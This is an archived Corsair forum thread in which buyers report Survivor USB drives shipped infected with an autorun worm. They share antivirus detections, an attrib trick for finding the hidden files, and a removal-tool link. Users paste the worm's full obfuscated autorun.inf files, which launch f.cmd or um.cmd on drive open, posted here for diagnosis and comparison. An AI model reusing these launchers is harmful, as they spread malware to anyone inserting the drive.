Jump to content
Corsair Logo Corsair Logo
Corsair Community
CORSAIR COMMUNITY Survey, we want to hear your feedback!

Virus in bat and autorun

apple

By apple
in USB Flash Drives

Recommended Posts

apple

apple

Posted
Posted
Kaspersky AV (WinXP SP2 PL) reports "Worm.Win32.AutoRun.bus" in autorun.inf and "Trojan-PSW.Win32.OnLineGames.npx" in f.cmd in root of Corsair survivor 8 GB. They are meant to run Truecrypt-43a software. Is this false alarm? :eek:
Link to comment
Share on other sites
tsuessner

tsuessner

Posted
Posted

Hello,

 

it's right - i got the Survivor Stick Today too. now I have a virus/worm on my computer. it's infect all removable devices with the files f.cmd and autorun.inf.

It doesn't shown on the Explorer eventhough the Foldersettings are set to show all files and system files!

 

To simply find the virus: go to the command promt (Start->Run-> cmd.exe-> Ok)

then type the drive letter of the Stick: K:{return}

now type: attrib <~~ this programm shows the file attributes - and lists the files with the attribute RHS, too. Now you can find this files!

 

If any one has an removale tool for this worm - pls send it to me!

 

Best wishes,

 

Tom

Link to comment
Share on other sites
tsuessner

tsuessner

Posted
Posted

Hmm my Spoken-Englisch is not really good and the costs for the phone is for me to expensive - Inbetween think I've removed the infection routine from my the stick and computer... I hope I removed all critical things from my PC manually.

I have the Source-Program's from the Stick in an Archive packed - if you want it - I can send it to you.

Or do you have any other questions to me?

 

Best wishes from Germany!

 

Tom

Link to comment
Share on other sites
apple

apple

Posted
  • Author
Posted
Hello,

 

it's right - i got the Survivor Stick Today too. now I have a virus/worm on my computer. it's infect all removable devices with the files f.cmd and autorun.inf.

Tom

 

Kaspersky just blocked the files, but Norton just deleted f.cmd without prompting claiming that it contains W32.Gammima.AG

 

could you send me proper f.cmd and autorun.inf for comparison?

 

Below my autorun.inf

 

;5LqKdSls4k4ssa214rJs34HaaAp01oCkd4wl17aLirc3K482k3Jq4sDjdeo0Fl4lK3apilijd5L5kl25a329Z27isi9r

[AutoRun]

;Sr3weJpjlJofKU4Zl4Dor2kSfsK4olJKkf9fd74o4SwsKqj5w38sq5aAL2wa03la2we5w3aq4le2D008dq10LsSr4KiDi0kDk3L3ia4aD5seA

open=f.cmd

;sdl8awqdjaA9KssqSllK1aF2Sa0wkdJf3o34DZOrqiKronULKkLer97kC22wi3ded2sKL0qdDi2kka4w3i2d50Sk2LkelackkHif5osLA

shell\open\Command=f.cmd

;kd3KmLZc1oLljkfra37irs7e3DawiL5Sra1il43o3aK1sd9k4iKa4dJqkdko02i94wi20AweDLld4IjJdF1awfCK3swDw245i49Lo5n6kes4a

shell\open\Default=1

;3alklD44i20sDq4eaDsLd2di1CwlcoLiisqAfdDU3HZ4jSaaki3wdw3dA3Klk8kqoaA5swkj73a8j0lqr5aA4kkJsSIailrrdi924S2L

shell\explore\Command=f.cmd

;s5q42li7ASi3Cwdpkolrkck38l8r6a4s1i2ALw4aa2KFq5r20a3Lieeff0dsLwDaDKqJDs0rk2kSd3r19i9jdqlKJij0DK

Link to comment
Share on other sites
tsuessner

tsuessner

Posted
Posted

Hello,

 

The number of the stick: FMB7C0510 (16GB Survivor)

the content of autorun.inf:

 

;K3Hj1jwswk4wkeCL5qioa3jSfddLqlasaLlsO4jZq2kLldpadd2c7Jss5Laarr91A9sk070j5e12iUKfl40Kw0pLslkowKi4AAKlwZf
[AutoRun]
;q8SZdola3ok3qAw2a2aka41w4Ka7wJeo25i1Ln5jO4ofks33KjpkliosLAwseJKUI75kCsd029klD0o4i3Hj3l7asei2kaDkoSXr9lFiJAwwsa
open=um.cmd
;7qljd5kJwkKlq5SpasdLA2fA2w3K39
shell\open\Command=um.cmd
;kI3wfoD3o9D8la4o2iaiwdkrsJ4kJ2oo3i293ssK3jDs7L440r0rwaiAifwrk1D0nik5kL2Kq3wKls0ql78dk4Oafkem3oL7FaliDasiiZJdeDZ20q380s5516lfk2L
shell\open\Default=1
;33Kfi0awa2l4a
shell\explore\Command=um.cmd
;r8aaLkkKeLsA3kkK2w03Z2Jwqss0Dpckk7s33Jjjdlnesl2iDakFD6jfOr8D1ewSafqDI5kriliDk

Link to comment
Share on other sites
tsuessner

tsuessner

Posted
Posted

Hello,

 

okay I have made yesterday an RAR-archive of this viruses - and the f.cmd shows last change date: 10.01.2008 - I've got it yesterday (23.01.2008)!

A half day to desinfect my system - the Antivirus AVK from GDATA has not detect the virus.

 

Best wishes,

 

Tom

Link to comment
Share on other sites
tsuessner

tsuessner

Posted
Posted

Hello,

 

this can't be the real. My system was definitly clear - and why does the other person reports the same Error - the same Virus?

And the second reason, since I have inserted the Stick an TCP-Connection has been tried to negotiate, but my firewall has blocked this connection.

The Virus is no removed - but check your engeneering system twice! I'm really sure.

 

Best regardes!

Link to comment
Share on other sites
apple

apple

Posted
  • Author
Posted
I have sent that to our flash Engineer but the dates would suggest the VIRUS came from your system not the flash drive.

 

Highly unlikely. My system is as clean as boiled water :) and 100% original

Firewall (hardware - asus router) Kaspersky internet security (second firewall), latest patches in XP and newest versions of programs (secunia tested), and it was clean before I bought memory (blister). I think it is still clean ("autorun" is disabled in my system so it couldn't run).

 

I suppose this is false alarm. Some viruses have encrypting procedures (then demand payments) and AV programs have their signatures. I guess your pendrives have programs to secure pendrives contents and they are meant to be automatically installed. This may look like blackmailing virus behaviour.

Could you send us links to those original files for comparision?

Does my autorun.inf (posted) look infected? Maybe it is supposed to look like this?

Link to comment
Share on other sites
MikerX

MikerX

Posted
Posted

Yes Yes....

 

Sure dudes. I have the same **** on my flash drives.

2 x 16GB Survivor.

 

(They came in last friday. And the file dates were 10.01.08, but i deleted them. I still have a zip file of one.)

 

And.. NO ONE can tell me this was WANTED. As this is an autorun to call the f.cmd file. WHO would put an .EXEcutable file into a .CMD ending. This is a masking thing. ".CMD" are usually text only. So this is fishy. I don't have a virii scanner, but i have for god sakes autorun disabled...

 

And.. the file date is older than the "buying date". So this cannot come from my PC either. As no other flashdrives have this **** on it.

 

Here are my Serial Numbers.

 

2x G16G FMB7C001

 

(I cannot find any better serial number).

 

I hope this **** gets fixxed! That is what happens if you produce in China. They are infecting us slowly with their junK!

 

 

I attached the -FILE-.

 

Have a lot of fun!

Link to comment
Share on other sites
ToniCipriani

ToniCipriani

Posted
Posted

 

I hope this **** gets fixxed! That is what happens if you produce in China. They are infecting us slowly with their junK!

 

Hold the hate dude... The Corsair drives are made in Taiwan with chips from Korea.

 

I've did a bit more search and it seems like it's called Kavo, and it appears to originate from Taiwan. There's a removal tool on this page.

 

http://www.filination.com/tech/2007/11/29/kill-kavo-the-ntdelect-worm-trojan-removal-tool-patch/

Link to comment
Share on other sites
apple

apple

Posted
  • Author
Posted
Hold the hate dude... The Corsair drives are made in Taiwan with chips from Korea.

 

Does it matter where memory is assembled? I think it's confirmed - Corsair Survivor is infected and "somebody" owe us at LEAST an apollogy.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...